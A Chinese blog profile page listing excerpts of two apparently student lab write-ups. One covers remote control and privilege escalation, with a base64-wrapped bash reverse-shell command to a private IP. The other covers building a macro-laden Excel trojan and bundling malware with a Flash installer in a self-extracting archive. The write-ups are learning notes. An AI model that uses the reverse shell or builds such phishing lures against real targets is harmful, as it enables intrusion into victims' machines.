自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(2)
  • 收藏
  • 关注

原创 远程控制技术和权限提升技术

推测该字符是某服务的账号密码,又知道inferno用户下有flag提示,应该是inferno用户的账密,又靶机开放22-ssh服务,那这应该是ssh服务的账密。命令:echo ‘/bin/bash -i >& /dev/tcp/192.168.137.131/444 0>&1’|base64。尝试用/bin/bash/进行一个交互式的bash shell 连接,监听端口为4444,并进行base64加密。查看靶机的/mnt/hell.sh文件,发现hell加密字符串,是brainfuck语言。

2024-08-30 23:08:47 685

原创 社会工程学

实验过程中遇到的问题:恶意excel文件多次尝试不能上线,通过多次重新制作excel文件、仔细核对文件左上角的木马并多次尝试解决;正常文件和恶意木马打包时要使用特定的压缩工具打包。将制作的木马程序和flash安装包用winrar压缩在一起,并设置解压后运行这两个文件。通过本次实验,我学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。学会制作简单的钓鱼样本并理解钓鱼样本木马的工作原理。2、将正常的软件和恶意木马进行捆绑打包。然后隐藏宏,并另存为启用宏的工作表。1、制作恶意的excel文件。

2024-08-30 22:59:14 412

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除